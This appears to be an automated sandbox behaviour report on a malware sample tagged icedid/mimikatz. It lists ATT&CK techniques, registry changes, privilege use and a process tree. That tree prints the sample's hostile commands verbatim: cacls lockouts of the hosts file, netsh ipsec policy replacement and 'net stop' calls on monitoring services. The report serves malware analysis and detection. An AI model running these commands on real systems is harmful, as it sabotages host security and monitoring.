Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.execmd.exeqicmew.exenet1.exeschtasks.exenetsh.exesc.execacls.exe2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exenet.exenetsh.exeschtasks.execmd.execacls.exenetsh.exenet1.exenet1.execmd.execmd.exenet.execmd.exePING.EXEcmd.exenetsh.exenet.exenet1.exenet1.exenet1.execmd.exenetsh.execmd.exenet.exenet.execmd.exenetsh.exenetsh.exenet.exenet1.exenetsh.execmd.exenetsh.exebjfisnrbq.exenetsh.execmd.execmd.execacls.exewpcap.exenet1.execmd.execmd.exenetsh.exenetsh.execmd.execmd.execacls.execmd.execacls.execmd.execacls.exenetsh.execmd.execmd.exeschtasks.exenetsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qicmew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bjfisnrbq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

cmd.exePING.EXE

pid	Process
708	cmd.exe
4956	PING.EXE

NSIS installer 3 IoCs

installer

Processes:

resource	yara_rule
behavioral2/files/0x000e000000023b6b-6.dat	nsis_installer_2
behavioral2/files/0x0014000000023b90-15.dat	nsis_installer_1
behavioral2/files/0x0014000000023b90-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 45 IoCs

Processes:

btjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exeyittybr.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	yittybr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	yittybr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	yittybr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	yittybr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	yittybr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	yittybr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe

Modifies registry class 14 IoCs

Processes:

yittybr.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	yittybr.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
4956	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid	Process
3868	schtasks.exe
3548	schtasks.exe
4344	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

yittybr.exe

pid	Process
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe

Suspicious behavior: LoadsDriver 15 IoCs

Processes:

pid	Process
656
656
656
656
656
656
656
656
656
656
656
656
656
656
656

Suspicious behavior: RenamesItself 1 IoCs

Processes:

2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe

pid	Process
4608	2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exeyittybr.exeyittybr.exevfshost.exebtjlhtrlh.exettlnnh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exe

description	pid	Process
Token: SeDebugPrivilege	4608	2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	2500	yittybr.exe
Token: SeDebugPrivilege	1216	yittybr.exe
Token: SeDebugPrivilege	1964	vfshost.exe
Token: SeDebugPrivilege	2520	btjlhtrlh.exe
Token: SeLockMemoryPrivilege	1448	ttlnnh.exe
Token: SeLockMemoryPrivilege	1448	ttlnnh.exe
Token: SeDebugPrivilege	4432	btjlhtrlh.exe
Token: SeDebugPrivilege	4752	btjlhtrlh.exe
Token: SeDebugPrivilege	4476	btjlhtrlh.exe
Token: SeDebugPrivilege	3640	btjlhtrlh.exe
Token: SeDebugPrivilege	2288	btjlhtrlh.exe
Token: SeDebugPrivilege	3780	btjlhtrlh.exe
Token: SeDebugPrivilege	2756	btjlhtrlh.exe
Token: SeDebugPrivilege	4276	btjlhtrlh.exe
Token: SeDebugPrivilege	4156	btjlhtrlh.exe
Token: SeDebugPrivilege	2260	btjlhtrlh.exe
Token: SeDebugPrivilege	2512	btjlhtrlh.exe
Token: SeDebugPrivilege	3896	btjlhtrlh.exe
Token: SeDebugPrivilege	2424	btjlhtrlh.exe
Token: SeDebugPrivilege	1808	btjlhtrlh.exe
Token: SeDebugPrivilege	4540	btjlhtrlh.exe
Token: SeDebugPrivilege	3420	btjlhtrlh.exe
Token: SeDebugPrivilege	3464	btjlhtrlh.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exeyittybr.exeyittybr.exexohudmc.exeqicmew.exeyittybr.exeyittybr.exe

pid	Process
4608	2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe
4608	2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe
2500	yittybr.exe
2500	yittybr.exe
1216	yittybr.exe
1216	yittybr.exe
1528	xohudmc.exe
4368	qicmew.exe
368	yittybr.exe
368	yittybr.exe
4668	yittybr.exe
4668	yittybr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.execmd.exeyittybr.execmd.execmd.exenet.exenet.exenet.exenet.execmd.exenet.exe

description	pid	Process	procid_target
PID 4608 wrote to memory of 708	4608	2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe	85
PID 4608 wrote to memory of 708	4608	2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe	85
PID 4608 wrote to memory of 708	4608	2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe	85
PID 708 wrote to memory of 4956	708	cmd.exe	87
PID 708 wrote to memory of 4956	708	cmd.exe	87
PID 708 wrote to memory of 4956	708	cmd.exe	87
PID 708 wrote to memory of 2500	708	cmd.exe	94
PID 708 wrote to memory of 2500	708	cmd.exe	94
PID 708 wrote to memory of 2500	708	cmd.exe	94
PID 1216 wrote to memory of 4540	1216	yittybr.exe	96
PID 1216 wrote to memory of 4540	1216	yittybr.exe	96
PID 1216 wrote to memory of 4540	1216	yittybr.exe	96
PID 4540 wrote to memory of 4928	4540	cmd.exe	98
PID 4540 wrote to memory of 4928	4540	cmd.exe	98
PID 4540 wrote to memory of 4928	4540	cmd.exe	98
PID 4540 wrote to memory of 1012	4540	cmd.exe	99
PID 4540 wrote to memory of 1012	4540	cmd.exe	99
PID 4540 wrote to memory of 1012	4540	cmd.exe	99
PID 4540 wrote to memory of 1392	4540	cmd.exe	100
PID 4540 wrote to memory of 1392	4540	cmd.exe	100
PID 4540 wrote to memory of 1392	4540	cmd.exe	100
PID 4540 wrote to memory of 2124	4540	cmd.exe	101
PID 4540 wrote to memory of 2124	4540	cmd.exe	101
PID 4540 wrote to memory of 2124	4540	cmd.exe	101
PID 4540 wrote to memory of 944	4540	cmd.exe	102
PID 4540 wrote to memory of 944	4540	cmd.exe	102
PID 4540 wrote to memory of 944	4540	cmd.exe	102
PID 4540 wrote to memory of 2428	4540	cmd.exe	103
PID 4540 wrote to memory of 2428	4540	cmd.exe	103
PID 4540 wrote to memory of 2428	4540	cmd.exe	103
PID 1216 wrote to memory of 4512	1216	yittybr.exe	106
PID 1216 wrote to memory of 4512	1216	yittybr.exe	106
PID 1216 wrote to memory of 4512	1216	yittybr.exe	106
PID 1216 wrote to memory of 4168	1216	yittybr.exe	108
PID 1216 wrote to memory of 4168	1216	yittybr.exe	108
PID 1216 wrote to memory of 4168	1216	yittybr.exe	108
PID 1216 wrote to memory of 4388	1216	yittybr.exe	110
PID 1216 wrote to memory of 4388	1216	yittybr.exe	110
PID 1216 wrote to memory of 4388	1216	yittybr.exe	110
PID 1216 wrote to memory of 4528	1216	yittybr.exe	113
PID 1216 wrote to memory of 4528	1216	yittybr.exe	113
PID 1216 wrote to memory of 4528	1216	yittybr.exe	113
PID 4528 wrote to memory of 1792	4528	cmd.exe	115
PID 4528 wrote to memory of 1792	4528	cmd.exe	115
PID 4528 wrote to memory of 1792	4528	cmd.exe	115
PID 1724 wrote to memory of 4076	1724	net.exe	118
PID 1724 wrote to memory of 4076	1724	net.exe	118
PID 1724 wrote to memory of 4076	1724	net.exe	118
PID 4608 wrote to memory of 4244	4608	net.exe	121
PID 4608 wrote to memory of 4244	4608	net.exe	121
PID 4608 wrote to memory of 4244	4608	net.exe	121
PID 1004 wrote to memory of 1992	1004	net.exe	124
PID 1004 wrote to memory of 1992	1004	net.exe	124
PID 1004 wrote to memory of 1992	1004	net.exe	124
PID 4492 wrote to memory of 4992	4492	net.exe	127
PID 4492 wrote to memory of 4992	4492	net.exe	127
PID 4492 wrote to memory of 4992	4492	net.exe	127
PID 1216 wrote to memory of 2892	1216	yittybr.exe	128
PID 1216 wrote to memory of 2892	1216	yittybr.exe	128
PID 1216 wrote to memory of 2892	1216	yittybr.exe	128
PID 2892 wrote to memory of 5028	2892	cmd.exe	130
PID 2892 wrote to memory of 5028	2892	cmd.exe	130
PID 2892 wrote to memory of 5028	2892	cmd.exe	130
PID 5028 wrote to memory of 2592	5028	net.exe	131

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2056
- C:\Windows\TEMP\lntjubmbe\ttlnnh.exe
  "C:\Windows\TEMP\lntjubmbe\ttlnnh.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1448

C:\Users\Admin\AppData\Local\Temp\2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-21_3d54aa8dd24e7c928ff5e7af758899aa_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tllefmnq\yittybr.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:708
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4956
- - C:\Windows\tllefmnq\yittybr.exe
    C:\Windows\tllefmnq\yittybr.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2500

C:\Windows\tllefmnq\yittybr.exe
C:\Windows\tllefmnq\yittybr.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4928
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1392
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:944
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2428
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4512
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4168
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4528
- - C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe
    C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1792
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1724
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4076
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4608
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4244
  - - C:\Windows\SysWOW64\net.exe
